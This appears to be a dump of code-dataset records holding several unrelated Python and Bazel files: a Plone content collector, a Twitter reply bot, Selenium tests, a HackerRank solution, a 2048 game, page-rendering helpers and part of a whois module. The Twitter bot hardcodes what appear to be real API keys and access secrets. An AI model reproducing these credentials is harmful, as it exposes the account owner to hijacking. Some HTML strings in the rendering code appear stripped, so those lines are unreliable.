'getObjPositionInParent'}):\n obj = brain.getObject()\n\n if IPPContent.providedBy(obj):\n items.append(dict(obj=obj, level=level))\n else:\n LOG.warn('IPPContent not provided by %s' % obj.absolute_url(1))\n\n if HAVE_DEXTERITY:\n if (IATFolder.providedBy(obj) or IDexterityContainer.providedBy(obj)) and not IArchiveFolder.providedBy(obj):\n collect_objects(obj, level+1, items)\n else:\n if IATFolder.providedBy(obj) and not IArchiveFolder.providedBy(obj):\n collect_objects(obj, level+1, items)\n\n utils = getToolByName(self.context, 'plone_utils')\n wf_tool = getToolByName(self.context, 'portal_workflow')\n\n html = list()\n collected_objs = list()\n collect_objects(self.context, 0, collected_objs)\n for d in collected_objs:\n level = d['level']\n obj = d['obj']\n if filter_uids and not d['obj'].UID() in filter_uids:\n LOG.info('Filtered: %s' % obj.absolute_url(1))\n continue\n LOG.info('Introspecting %s' % obj.absolute_url(1))\n view = obj.restrictedTraverse('@@asHTML', None)\n if view is not None:\n pt = utils.normalizeString(obj.portal_type)\n review_state = wf_tool.getInfoFor(obj, 'review_state')\n if published_only and review_state not in ['published']:\n continue\n html.append('
\\n' % \n (level, pt, review_state, obj.absolute_url(1), obj.getId(), obj.getId(), review_state, level, obj.UID()))\n html.append('
')\n html.append('' % obj.absolute_url())\n try:\n html.append('
%s
' % wf_tool.getInfoFor(obj, 'review_state'))\n except WorkflowException:\n pass\n html.append('
')\n html.append(view())\n html.append('
')\n else :\n LOG.warn('No @@asHTML view found for %s' % obj.absolute_url(1))\n\n return '\\n'.join(html)\n\n def __call__(self, published_only=False, filter_uids=[]):\n \"\"\" Collector for folderish content \"\"\"\n return self.collect(published_only=published_only, filter_uids=filter_uids)\n","sub_path":"pp/client/plone/browser/types/folder_flat.py","file_name":"folder_flat.py","file_ext":"py","file_size_in_byte":3900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"405899946","text":"\nimport time\nimport tweepy\nprint(\"this is my tweeter bot\")\n\nCONSUMER_KEY=\"sYdoG1wzZqE6qvxZBejWNh1n2\"\nCONSUMER_SECRET= \"MH22PoAvRXnBHQPhVJCdBNUEVVE1zFMtpPxHJDDn4fXBRO7h14\"\nACCESS_KEY=\"1095324898384326656-f8JT063hg1gCHlyFk4nyw4sjrMj8zP\"\nACCESS_SECRET=\"4DOVRfZL2iLY0hHUVRhBaRTqNtWwnVPNpXmkkJFyZdUOW\"\n\nauth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)\nauth.set_access_token(ACCESS_KEY, ACCESS_SECRET)\napi = tweepy.API(auth)\n\nFILE_NAME = 'last_seen_id.txt'\n\ndef retrieve_last_seen_id(file_name):\n f_read = open(file_name, 'r')\n last_seen_id = int(f_read.read().strip())\n f_read.close()\n return last_seen_id\n\ndef store_last_seen_id(last_seen_id, file_name):\n f_write = open(file_name, 'w')\n f_write.write(str(last_seen_id))\n f_write.close()\n return\ndef reply_to_tweets():\n print('replying to tweets...', flush=True)\n # DEV NOTE: use 1060651988453654528 for testing.\n last_seen_id = retrieve_last_seen_id(FILE_NAME)\n # NOTE: We need to use tweet_mode='extended' below to show\n # all full tweets (with full_text). Without it, long tweets\n # would be cut off.\n mentions = api.mentions_timeline(\n last_seen_id,\n tweet_mode='extended')\n for mention in reversed(mentions):\n print(str(mention.id) + ' - ' + mention.full_text, flush=True)\n last_seen_id = mention.id\n store_last_seen_id(last_seen_id, FILE_NAME)\n if '#helloworld' in mention.full_text.lower():\n print('found #helloworld!', flush=True)\n print('responding back...', flush=True)\n api.update_status('@' + mention.user.screen_name +\n '...HI...', mention.id)\n\nwhile True:\n reply_to_tweets()\n time.sleep(15)","sub_path":"my_tweeter.py","file_name":"my_tweeter.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"94172985","text":"from Paragraphs.FocusParagraph import FocusParagraph\nimport pytest\n\n\n@pytest.allure.feature('Paragraphs')\n@pytest.allure.story('Focus paragraph')\n@pytest.mark.usefixtures('init_solution_page')\nclass TestFocusParagraph:\n\n @pytest.allure.title('VDM-1192 Focus paragraph - creation')\n def test_focus_creating(self):\n self.node.fill_solution_page_mandatory()\n self.node.add_paragraph('focus')\n focus_paragraph = FocusParagraph(self.driver)\n focus_paragraph.fill_focus_paragraph_mandatory()\n url = self.driver.current_url\n self.node.save_node()\n assert self.driver.current_url != url\n assert (focus_paragraph.test_data['description'] in self.driver.page_source)\n self.node.delete_node()\n\n @pytest.allure.title('VDM-1192 Focus paragraph - creation with all fields')\n def test_focus_creating_all_fields(self):\n self.node.fill_solution_page_mandatory()\n self.node.add_paragraph('focus')\n focus_paragraph = FocusParagraph(self.driver)\n focus_paragraph.fill_focus_paragraph()\n url = self.driver.current_url\n self.node.save_node()\n assert self.driver.current_url != url\n assert (focus_paragraph.test_data['title'] in self.driver.page_source)\n assert (focus_paragraph.test_data['description'] in self.driver.page_source)\n assert (focus_paragraph.test_data['background'] in self.driver.page_source)\n assert (focus_paragraph.test_data['colour'] in self.driver.page_source)\n self.node.delete_node()\n\n @pytest.allure.title('VDM-1193 Focus paragraph - empty fields validation')\n def test_focus_empty_fields_validation(self):\n self.node.fill_solution_page_mandatory()\n self.node.add_paragraph('focus')\n focus_paragraph = FocusParagraph(self.driver)\n focus_paragraph.get_focus_title()\n url = self.driver.current_url\n self.node.save_node()\n assert self.driver.current_url == url\n assert self.node.get_error_msg()\n\n @pytest.allure.title('VDM-1194 Focus paragraph - check fields existing')\n def test_focus_fields_existing(self):\n self.node.add_paragraph('focus')\n focus_paragraph = FocusParagraph(self.driver)\n assert focus_paragraph.get_focus_title().is_displayed()\n assert focus_paragraph.get_description().is_displayed()\n assert focus_paragraph.get_colour().first_selected_option\n assert focus_paragraph.get_background().first_selected_option\n","sub_path":"test_paragraphs/test_focus.py","file_name":"test_focus.py","file_ext":"py","file_size_in_byte":2493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"30791997","text":"# !/Python34\n# Copyright 2015 Tim Murphy. All rights reserved.\n\n## HackerRank\n# Algorithms - Implementation - ACM ICPC Team\n# https://www.hackerrank.com/challenges/acm-icpc-team\n\n'''\nProblem:\n\nYou are given a list of N people who are attending ACM-ICPC \nWorld Finals. Each of them are either well versed in a topic or \nthey are not. Find out the maximum number of topics a 2-person \nteam can know. And also find out how many teams can know that maximum \nnumber of topics.\n\nNote Suppose a, b, and c are three different people, then (a,b) \nand (b,c) are counted as two different teams.\n\n\nInput:\n\nThe first line contains two integers, N and M, separated by a single \nspace, where N represents the number of people, and M represents the \nnumber of topics. N lines follow.\n\nEach line contains a binary string of length M. If the ith line's jth \ncharacter is 1, then the ith person knows the jth topic; \notherwise, he doesn't know the topic.\n\n\nConstraints:\n\n2 <= N <= 500 \n1 <= M <= 500\n\n\nOutput:\n\nOn the first line, print the maximum number of topics a 2-person team can know. \nOn the second line, print the number of 2-person teams that can know the \nmaximum number of topics.\n\n'''\n\n# Get n and m from user, initialize a list to store the skills of each member\nn, m = map(int, input().split())\nskills = []\n\n# Skills are represented as a binary string\nfor i in range(n):\n skills += [ int(input(), 2) ]\n\n# Initialize result trackers\nbestscore = 0\nbestteams = 0\n \n# Count the skills in each team of two players. If it's the highest number of skills,\n# Record it and set the number of teams with that score to 1. If it's a repeat of\n# the higest score, tick up the bestteams counter by one.\nfor i in range(n):\n for j in range(i + 1, n):\n mix = str(bin(skills[i] | skills[j])).count('1')\n if mix > bestscore:\n bestscore = mix\n bestteams = 1\n elif mix == bestscore:\n bestteams += 1\n\n# Print results\nprint(bestscore)\nprint(bestteams)","sub_path":"python/ACM_ICPC_teams.py","file_name":"ACM_ICPC_teams.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"229865291","text":"\"\"\"\n 2048 游戏核心算法\n 谈架构\n 显示(界面)与控制(算法)分离\n 控制台\n PyQt\n PyGame\n\n 谈算法\n 1. 高内聚:\n 上下移动 -矩阵转置-> 左右移动\n 向左移动 --> 合并数据 --> 零元素后移\n 向右移动 -翻转-> 合并数据 --> 零元素后移\n 2. 降维思想:\n 将二维列表的操作,改为对一维列表的操作.\n\"\"\"\nlist_merge = [2, 0, 0, 2]\n\n\n# 1. 定义函数 zero_to_end()\n# [2,0,2,0] --> [2,2,0,0]\n# [2,0,0,2] --> [2,2,0,0]\n# [2,4,0,2] --> [2,4,2,0]\ndef zero_to_end():\n \"\"\"\n 零元素向后移动\n 思想:从后向前判断,如果是0则删除,在末尾追加.\n \"\"\"\n for i in range(len(list_merge) - 1, -1, -1):\n if list_merge[i] == 0:\n del list_merge[i]\n list_merge.append(0)\n\n\n# zero_to_end()\n# print(list_merge)\n\n\n# 2. 定义函数 merge()\n# [2,0,2,0] -->[2,2,0,0] --> [4,0,0,0]\n# [2,0,0,2] -->[2,2,0,0] --> [4,0,0,0]\n# [4,4,4,4] --> [8,8,0,0]\n# [2,0,4,2] --> [2,4,2,0]\ndef merge():\n \"\"\"\n 合并数据\n 核心思想:零元素后移,判断是否相邻相同。如果是则合并.\n \"\"\"\n zero_to_end()\n for i in range(len(list_merge) - 1):\n if list_merge[i] == list_merge[i + 1]:\n list_merge[i] += list_merge[i + 1]\n del list_merge[i + 1]\n list_merge.append(0)\n # 加分\n\n\n# merge()\n# print(list_merge)\n\n# 3. 向左移动\nmap = [\n [2, 0, 0, 2],\n [4, 2, 0, 2],\n [2, 4, 2, 4],\n [0, 4, 0, 4],\n]\n\n\ndef move_left():\n \"\"\"\n 向左移动map\n 思想:获取每行,交给list_merge,在通知merge()进行合并\n :return:\n \"\"\"\n global list_merge\n for line in map:\n list_merge = line\n merge()\n\n\n# move_left()\n# print(map)\n\n# 4. 向右移动 move_right\ndef move_right():\n \"\"\"\n 向左移动map\n 思想:获取每行,交给list_merge,在通知merge()进行合并\n :return:\n \"\"\"\n global list_merge\n for line in map:\n # 从右向左获取数据形成新列表\n list_merge = line[::-1]\n # 处理数据\n merge()\n # 将处理后的数据再从右向左还给map\n line[::-1] = list_merge\n\n\n# move_right()\n# print(map)\n\n# 5. 向上移动 move_up 转置 move_left 转置\ndef square_matrix_transposition():\n \"\"\"\n 方阵转置(列转换为行)\n :param map: 需要转置的方阵\n :return:\n \"\"\"\n for c in range(1, len(map)): # 1 2 3\n for r in range(c, len(map)):\n map[r][c - 1], map[c - 1][r] = map[c - 1][r], map[r][c - 1]\n\n\ndef move_up():\n \"\"\"\n 向上移动\n 思想: 转置 move_left 转置 \n \"\"\"\n square_matrix_transposition()\n move_left()\n square_matrix_transposition()\n\n\n# 6. 向下移动\ndef move_down():\n \"\"\"\n 向下移动\n 思想: 转置 move_right 转置\n :return:\n \"\"\"\n square_matrix_transposition()\n move_right()\n square_matrix_transposition()\n\n\n# move_up()\nmove_down()\nprint(map)\n","sub_path":"month02/day13/FTP/game2048.py","file_name":"game2048.py","file_ext":"py","file_size_in_byte":3188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"161217743","text":"#!/usr/bin/env python3.9\nimport time\nimport html\nimport collections\nimport urllib.parse\nimport wsgiref.handlers\nimport common\nimport configuration\nimport indent\n\nTheme = collections.namedtuple('Theme', ['url', 'sri', 'navbar', 'navbar2', 'dark'])\n\n# https://bootswatch.com/3/\nthemes = {\n\t'cerulean': Theme('https://maxcdn.bootstrapcdn.com/bootswatch/3.3.7/cerulean/bootstrap.min.css', 'sha384-zF4BRsG/fLiTGfR9QL82DrilZxrwgY/+du4p/c7J72zZj+FLYq4zY00RylP9ZjiT', '#54b4eb', '#04519b', False),\n\t'cosmo': Theme('https://maxcdn.bootstrapcdn.com/bootswatch/3.3.7/cosmo/bootstrap.min.css', 'sha384-h21C2fcDk/eFsW9sC9h0dhokq5pDinLNklTKoxIZRUn3+hvmgQSffLLQ4G4l2eEr', '#222222', '#2780e3', False),\n\t'cyborg': Theme('https://maxcdn.bootstrapcdn.com/bootswatch/3.3.7/cyborg/bootstrap.min.css', 'sha384-D9XILkoivXN+bcvB2kSOowkIvIcBbNdoDQvfBNsxYAIieZbx8/SI4NeUvrRGCpDi', '#060606', '#282828', True),\n\t'darkly': Theme('https://maxcdn.bootstrapcdn.com/bootswatch/3.3.7/darkly/bootstrap.min.css', 'sha384-S7YMK1xjUjSpEnF4P8hPUcgjXYLZKK3fQW1j5ObLSl787II9p8RO9XUGehRmKsxd', '#375a7f', '#00bc8c', True),\n\t'flatly': Theme('https://maxcdn.bootstrapcdn.com/bootswatch/3.3.7/flatly/bootstrap.min.css', 'sha384-+ENW/yibaokMnme+vBLnHMphUYxHs34h9lpdbSLuAwGkOKFRl4C34WkjazBtb7eT', '#2c3e50', '#18bc9c', False),\n\t'journal': Theme('https://maxcdn.bootstrapcdn.com/bootswatch/3.3.7/journal/bootstrap.min.css', 'sha384-1L94saFXWAvEw88RkpRz8r28eQMvt7kG9ux3DdCqya/P3CfLNtgqzMnyaUa49Pl2', '#ffffff', '#eb6864', False),\n\t'lumen': Theme('https://maxcdn.bootstrapcdn.com/bootswatch/3.3.7/lumen/bootstrap.min.css', 'sha384-gv0oNvwnqzF6ULI9TVsSmnULNb3zasNysvWwfT/s4l8k5I+g6oFz9dye0wg3rQ2Q', '#f8f8f8', '#ffffff', False),\n\t'paper': Theme('https://maxcdn.bootstrapcdn.com/bootswatch/3.3.7/paper/bootstrap.min.css', 'sha384-awusxf8AUojygHf2+joICySzB780jVvQaVCAt1clU3QsyAitLGul28Qxb2r1e5g+', '#ffffff', '#2196f3', False),\n\t'readable': Theme('https://maxcdn.bootstrapcdn.com/bootswatch/3.3.7/readable/bootstrap.min.css', 'sha384-Li5uVfY2bSkD3WQyiHX8tJd0aMF91rMrQP5aAewFkHkVSTT2TmD2PehZeMmm7aiL', '#ffffff', '#ffffff', False),\n\t'sandstone': Theme('https://maxcdn.bootstrapcdn.com/bootswatch/3.3.7/sandstone/bootstrap.min.css', 'sha384-G3G7OsJCbOk1USkOY4RfeX1z27YaWrZ1YuaQ5tbuawed9IoreRDpWpTkZLXQfPm3', '#3e3f3a', '#93c54b', False),\n\t'simplex': Theme('https://maxcdn.bootstrapcdn.com/bootswatch/3.3.7/simplex/bootstrap.min.css', 'sha384-C0X5qw1DlkeV0RDunhmi4cUBUkPDTvUqzElcNWm1NI2T4k8tKMZ+wRPQOhZfSJ9N', '#ffffff', '#d9230f', False),\n\t'slate': Theme('https://maxcdn.bootstrapcdn.com/bootswatch/3.3.7/slate/bootstrap.min.css', 'sha384-RpX8okQqCyUNG7PlOYNybyJXYTtGQH+7rIKiVvg1DLg6jahLEk47VvpUyS+E2/uJ', '#484e55', '#8a9196', True),\n\t'spacelab': Theme('https://maxcdn.bootstrapcdn.com/bootswatch/3.3.7/spacelab/bootstrap.min.css', 'sha384-L/tgI3wSsbb3f/nW9V6Yqlaw3Gj7mpE56LWrhew/c8MIhAYWZ/FNirA64AVkB5pI', '#ffffff', '#6d94bf', False),\n\t'superhero': Theme('https://maxcdn.bootstrapcdn.com/bootswatch/3.3.7/superhero/bootstrap.min.css', 'sha384-Xqcy5ttufkC3rBa8EdiAyA1VgOGrmel2Y+wxm4K3kI3fcjTWlDWrlnxyD6hOi3PF', '#4e5d6c', '#df691a', True),\n\t'united': Theme('https://maxcdn.bootstrapcdn.com/bootswatch/3.3.7/united/bootstrap.min.css', 'sha384-pVJelSCJ58Og1XDc2E95RVYHZDPb9AVyXsI8NoVpB2xmtxoZKJePbMfE4mlXw7BJ', '#e95420', '#772953', False),\n\t'yeti': Theme('https://maxcdn.bootstrapcdn.com/bootswatch/3.3.7/yeti/bootstrap.min.css', 'sha384-HzUaiJdCTIY/RL2vDPRGdEQHHahjzwoJJzGUkYjHVzTwXFQ2QN/nVgX7tzoMW3Ov', '#333333', '#008cba', False)\n}\n\ndef HtmlIndenter(stream):\n\treturn indent.Indenter(stream, html.escape)\n\ndef uri_to_url(environ, uri):\n\tassert(uri[0] == '/')\n\n\tscheme = environ['wsgi.url_scheme']\n\thost = environ['HTTP_HOST']\n\n\treturn '{0}://{1}{2}'.format(scheme, host, uri)\n\ndef match_in_qs(environ, values, fallback):\n\tresult = None\n\n\tfor key, value in urllib.parse.parse_qsl(environ['QUERY_STRING'], keep_blank_values=True):\n\t\tif key == '' or value != '':\n\t\t\tcontinue\n\t\tif not key in values:\n\t\t\tcontinue\n\n\t\tif result is None:\n\t\t\tresult = key\n\t\telif result != key:\n\t\t\treturn fallback\n\n\tif result is None:\n\t\tresult = ''\n\n\treturn values[result]\n\ndef make_content_disposition_header(filename, extension='', inline=True):\n\tfilename = filename + extension\n\tdisposition = 'inline' if inline else 'attachment'\n\ttry:\n\t\tattachment = 'filename={0}'.format(urllib.parse.quote(filename, encoding='ascii'))\n\texcept UnicodeEncodeError:\n\t\tattachment = 'filename*=UTF-8\\'\\'{0}'.format(urllib.parse.quote(filename, encoding='utf-8', errors='ignore'))\n\treturn ('Content-Disposition', '{0}; {1}'.format(disposition, attachment))\n\ndef make_nocache_header():\n\treturn ('Cache-Control', 'no-cache, no-store, must-revalidate')\n\ndef make_expires_header(expires):\n\treturn ('Expires', wsgiref.handlers.format_date_time(expires))\n\ndef make_tag(tag, attributes):\n\tformat = [tag]\n\tvalues = []\n\n\tfor attribute in attributes:\n\t\tif attribute[1] == '':\n\t\t\tcontinue\n\n\t\tformat.append('{0}=\"{{}}\"'.format(attribute[0]))\n\t\tvalues.append(attribute[1])\n\n\tformat = '<{0}>'.format(' '.join(format))\n\treturn [format] + values\n\ndef pretty_time(value):\n\treturn time.strftime(configuration.time_format, time.localtime(value))\n\ndef pretty_size(value):\n\tif value < 1024:\n\t\treturn '%uB' % value\n\telif value < 1048576:\n\t\treturn '%uK' % (value / 1024)\n\telif value < 8589934592:\n\t\treturn '%.1fM' % (value / 1048576.0)\n\telif value < 1099511627776:\n\t\treturn '%.2fG' % (value / 1073741824.0)\n\telse:\n\t\treturn '%.2fT' % (value / 1099511627776.0)\n\ndef render_page(environ, writer, code=200, headers=[], title=configuration.name, link_cb=None, navbar_cb=None, content_cb=None, script_cb=None):\n\ttheme = themes[configuration.theme]\n\th = HtmlIndenter(writer)\n\th.line('')\n\th.begin('')\n\th.begin('')\n\th.line('')\n\th.line('', theme.navbar2 if configuration.theme_inverse_navbar else theme.navbar)\n\th.line('{0}', title)\n\th.line('', theme.url, theme.sri)\n\tif link_cb:\n\t\tlink_cb(h)\n\th.end('')\n\th.begin('')\n\th.begin('')\n\th.begin('
')\n\tif content_cb:\n\t\tcontent_cb(h)\n\th.end('
')\n\th.line('')\n\th.line('')\n\tif script_cb:\n\t\tscript_cb(h)\n\th.end('')\n\th.end('')\n\n\treturn (code, [('Content-Type', 'text/html; charset=utf-8')] + headers)\n\ndef render_error_page(environ, writer, code, message):\n\th = HtmlIndenter(writer)\n\th.line('')\n\th.begin('')\n\th.begin('')\n\th.line('')\n\th.line('')\n\th.end('')\n\th.line('{0}', message)\n\th.end('')\n\n\treturn (code, [('Content-Type', 'text/html; charset=utf-8')])\n","sub_path":"page.py","file_name":"page.py","file_ext":"py","file_size_in_byte":7968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"333487815","text":"\"\"\"\n\n\"\"\"\n\nimport logging\n\nlogging.basicConfig(\n format='%(asctime)-15s [%(threadName)s] %(levelname)s %(name)s - %(message)s')\n\n_logger_methods = {\n 'debug': 'd',\n 'info': 'i',\n 'warn': 'w',\n 'error': 'e',\n 'exception': 'ex'\n}\n\n\ndef getlogger(name, level=logging.WARN):\n \"\"\"\n\n :param name:\n :param level:\n :return:\n \"\"\"\n _logger = logging.getLogger(name)\n _logger.setLevel(level)\n for item in _logger_methods.items():\n try:\n m = getattr(_logger, item[0])\n if m and not hasattr(_logger, item[1]):\n setattr(_logger, item[1], m)\n except AttributeError:\n pass\n\n return _logger\n","sub_path":"proxywall/loggers.py","file_name":"loggers.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"410170153","text":"load(\"@io_bazel_rules_scala//scala:providers.bzl\", \"DepsInfo\")\nload(\"//scala/private/toolchain_deps:toolchain_deps.bzl\", \"expose_toolchain_deps\")\n\ndef _scala_proto_toolchain_impl(ctx):\n toolchain = platform_common.ToolchainInfo(\n with_grpc = ctx.attr.with_grpc,\n with_flat_package = ctx.attr.with_flat_package,\n with_single_line_to_string = ctx.attr.with_single_line_to_string,\n blacklisted_protos = ctx.attr.blacklisted_protos,\n code_generator = ctx.attr.code_generator,\n main_generator = ctx.attr.main_generator,\n extra_generator_dependencies = ctx.attr.extra_generator_dependencies,\n scalac = ctx.attr.scalac.files_to_run,\n named_generators = ctx.attr.named_generators,\n )\n return [toolchain]\n\n# Args:\n# with_grpc: Enables generation of grpc service bindings for services\n# with_flat_package: When true, ScalaPB will not append the protofile base name to the package name\n# with_single_line_to_string: Enables generation of toString() methods that use the single line format\n# blacklisted_protos: list of protobuf targets to exclude from recursive building\n# code_generator: what code generator to use, usually you'll want the default\nscala_proto_toolchain = rule(\n _scala_proto_toolchain_impl,\n attrs = {\n \"with_grpc\": attr.bool(),\n \"with_flat_package\": attr.bool(),\n \"with_single_line_to_string\": attr.bool(),\n \"blacklisted_protos\": attr.label_list(default = []),\n \"code_generator\": attr.label(\n executable = True,\n cfg = \"exec\",\n default = Label(\"@io_bazel_rules_scala//src/scala/scripts:scalapb_worker\"),\n allow_files = True,\n ),\n \"main_generator\": attr.string(default = \"scalapb.ScalaPbCodeGenerator\"),\n \"named_generators\": attr.string_dict(),\n \"extra_generator_dependencies\": attr.label_list(\n providers = [JavaInfo],\n ),\n \"scalac\": attr.label(\n executable = True,\n cfg = \"exec\",\n default = Label(\"@io_bazel_rules_scala//src/java/io/bazel/rulesscala/scalac\"),\n allow_files = True,\n ),\n },\n)\n\ndef _scala_proto_deps_toolchain(ctx):\n toolchain = platform_common.ToolchainInfo(\n dep_providers = ctx.attr.dep_providers,\n )\n return [toolchain]\n\nscala_proto_deps_toolchain = rule(\n _scala_proto_deps_toolchain,\n attrs = {\n \"dep_providers\": attr.label_list(\n default = [\n \"@io_bazel_rules_scala//scala_proto:scalapb_compile_deps_provider\",\n \"@io_bazel_rules_scala//scala_proto:scalapb_grpc_deps_provider\",\n \"@io_bazel_rules_scala//scala_proto:scalapb_worker_deps_provider\",\n ],\n cfg = \"target\",\n providers = [DepsInfo],\n ),\n },\n)\n\ndef _export_scalapb_toolchain_deps(ctx):\n return expose_toolchain_deps(ctx, \"@io_bazel_rules_scala//scala_proto:deps_toolchain_type\")\n\nexport_scalapb_toolchain_deps = rule(\n _export_scalapb_toolchain_deps,\n attrs = {\n \"deps_id\": attr.string(\n mandatory = True,\n ),\n },\n incompatible_use_toolchain_transition = True,\n toolchains = [\"@io_bazel_rules_scala//scala_proto:deps_toolchain_type\"],\n)\n","sub_path":"scala_proto/scala_proto_toolchain.bzl","file_name":"scala_proto_toolchain.bzl","file_ext":"bzl","file_size_in_byte":3279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"525888364","text":"import sys\nfrom functools import wraps\nfrom typing import (\n Optional,\n List,\n Dict,\n Tuple,\n)\n\nfrom ._1_query import do_query\nfrom ._2_parse import (\n do_parse,\n NoneStrings,\n NoneStringsAdd,\n QuotaStrings,\n QuotaStringsAdd,\n)\n\nfrom ._3_adjust import Domain\nfrom ._0_init_tld import (\n ZZ,\n TLD_RE,\n validTlds,\n filterTldToSupportedPattern,\n mergeExternalDictWithRegex,\n)\n\nfrom .exceptions import (\n UnknownTld,\n FailedParsingWhoisOutput,\n UnknownDateFormat,\n WhoisCommandFailed,\n WhoisPrivateRegistry,\n WhoisQuotaExceeded,\n)\n\n\"\"\"\n Python module/library for retrieving WHOIS information of domains.\n\n By DDarko.org ddarko@ddarko.org http://ddarko.org/\n License MIT http://www.opensource.org/licenses/mit-license.php\n\n Usage example\n >>> import whois\n >>> domain = whois.query('google.com')\n >>> print(domain.__dict__) # print(whois.get('google.com'))\n\n {\n 'expiration_date': datetime.datetime(2020, 9, 14, 0, 0),\n 'last_updated': datetime.datetime(2011, 7, 20, 0, 0),\n 'registrar': 'MARKMONITOR INC.',\n 'name': 'google.com',\n 'creation_date': datetime.datetime(1997, 9, 15, 0, 0)\n }\n\n >>> print(domain.name)\n google.com\n\n >>> print(domain.expiration_date)\n 2020-09-14 00:00:00\n\n\"\"\"\n__all__ = [\n \"query\",\n \"get\",\n \"validTlds\",\n \"mergeExternalDictWithRegex\",\n \"NoneStrings\",\n \"NoneStringsAdd\",\n \"QuotaStrings\",\n \"QuotaStringsAdd\",\n]\n\n\nCACHE_FILE = None\nSLOW_DOWN = 0\n\n\ndef internationalizedDomainNameToPunyCode(d: List[str]) -> List[str]:\n return [k.encode(\"idna\").decode() or k for k in d]\n\n\ndef result2dict(func):\n @wraps(func)\n def _inner(*args, **kw):\n r = func(*args, **kw)\n return r and vars(r) or {}\n\n return _inner\n\n\ndef fromDomainStringToTld(\n domain: str,\n internationalized: bool,\n verbose: bool = False,\n):\n domain = domain.lower().strip().rstrip(\".\") # Remove the trailing dot to support FQDN.\n d: List[str] = domain.split(\".\")\n if verbose:\n print(d, file=sys.stderr)\n\n if d[0] == \"www\":\n d = d[1:]\n\n if len(d) == 1:\n return None, None\n\n tld: str = filterTldToSupportedPattern(domain, d, verbose)\n if verbose:\n print(f\"filterTldToSupportedPattern returns tld: {tld}\", file=sys.stderr)\n\n if internationalized and isinstance(internationalized, bool):\n d = internationalizedDomainNameToPunyCode(d)\n\n if verbose:\n print(tld, d, file=sys.stderr)\n\n return tld, d\n\n\ndef validateWeKnowTheToplevelDomain(tld, return_raw_text_for_unsupported_tld: bool = False): # may raise UnknownTld\n if tld not in TLD_RE.keys():\n if return_raw_text_for_unsupported_tld:\n return None\n a = f\"The TLD {tld} is currently not supported by this package.\"\n b = \"Use validTlds() to see what toplevel domains are supported.\"\n msg = f\"{a} {b}\"\n raise UnknownTld(msg)\n return TLD_RE.get(tld)\n\n\ndef verifyPrivateREgistry(thisTld: Dict): # may raise WhoisPrivateRegistry\n # signal we know the tld but it has no whos or does not respond with any information\n if thisTld.get(\"_privateRegistry\"):\n msg = \"This tld has either no whois server or responds only with minimal information\"\n raise WhoisPrivateRegistry(msg)\n\n\ndef doServerHintsForThisTld(tld: str, thisTld: Dict, server: Optional[str], verbose: bool = False):\n # allow server hints using \"_server\" from the tld_regexpr.py file\n thisTldServer = thisTld.get(\"_server\")\n if server is None and thisTldServer:\n server = thisTldServer\n if verbose:\n print(f\"using _server hint {server} for tld: {tld}\", file=sys.stderr)\n return server\n\n\ndef doSlowdownHintForThisTld(tld: str, thisTld, slow_down: int, verbose: bool = False) -> int:\n # allow a configrable slowdown for some tld's\n slowDown = thisTld.get(\"_slowdown\")\n if slow_down == 0 and slowDown and slowDown > 0:\n slow_down = slowDown\n if verbose:\n print(f\"using _slowdown hint {slowDown} for tld: {tld}\", file=sys.stderr)\n return slow_down\n\n\ndef doUnsupportedTldAnyway(\n tld: str,\n dl: List[str],\n ignore_returncode: bool = False,\n slow_down: int = 0,\n server: Optional[str] = None,\n verbose: bool = False,\n):\n include_raw_whois_text = True\n\n # we will not hunt for possible valid first level domains as we have no actual feedback\n\n whois_str = do_query(\n dl=dl,\n slow_down=slow_down,\n ignore_returncode=ignore_returncode,\n server=server,\n verbose=verbose,\n )\n\n # we will only return minimal data\n data = {\n \"tld\": tld,\n \"domain_name\": [],\n }\n data[\"domain_name\"] = [\".\".join(dl)] # note the fields are default all array, except tld\n\n if verbose:\n print(data, file=sys.stderr)\n\n return Domain(\n data=data,\n whois_str=whois_str,\n verbose=verbose,\n include_raw_whois_text=include_raw_whois_text,\n return_raw_text_for_unsupported_tld=True,\n )\n\n\nLastWhois: Dict = {\n \"Try\": [],\n}\n\n\ndef get_last_raw_whois_data():\n global LastWhois\n return LastWhois\n\n\ndef query(\n domain: str,\n force: bool = False,\n cache_file: Optional[str] = None,\n cache_age: int = 60 * 60 * 48,\n slow_down: int = 0,\n ignore_returncode: bool = False,\n server: Optional[str] = None,\n verbose: bool = False,\n with_cleanup_results=False,\n internationalized: bool = False,\n include_raw_whois_text: bool = False,\n return_raw_text_for_unsupported_tld: bool = False,\n timeout: float = None,\n) -> Optional[Domain]:\n \"\"\"\n force=True Don't use cache.\n cache_file= Use file to store cache not only memory.\n cache_age=172800 Cache expiration time for given domain, in seconds\n slow_down=0 Time [s] it will wait after you query WHOIS database.\n This is useful when there is a limit to the number of requests at a time.\n server: if set use the whois server explicitly for making the query:\n propagates on linux to \"whois -h \"\n propagates on Windows to whois.exe \n with_cleanup_results: cleanup lines starting with % and REDACTED FOR PRIVACY\n internationalized: if true convert with internationalizedDomainNameToPunyCode().\n ignore_returncode: if true and the whois command fails with code 1, still process the data returned as normal.\n verbose: if true, print relevant information on steps taken to standard error\n include_raw_whois_text:\n if reqested the full response is also returned.\n return_raw_text_for_unsupported_tld:\n if the tld is unsupported, just try it anyway but return only the raw text.\n timeout:\n timeout in seconds for the whois command to return a result.\n \"\"\"\n global LastWhois\n LastWhois[\"Try\"] = [] # init on start of query\n\n assert isinstance(domain, str), Exception(\"`domain` - must be \")\n return_raw_text_for_unsupported_tld = bool(return_raw_text_for_unsupported_tld)\n\n tld, dl = fromDomainStringToTld(domain, internationalized, verbose)\n if tld is None:\n return None\n\n thisTld = validateWeKnowTheToplevelDomain(tld, return_raw_text_for_unsupported_tld) # may raise UnknownTld\n if thisTld 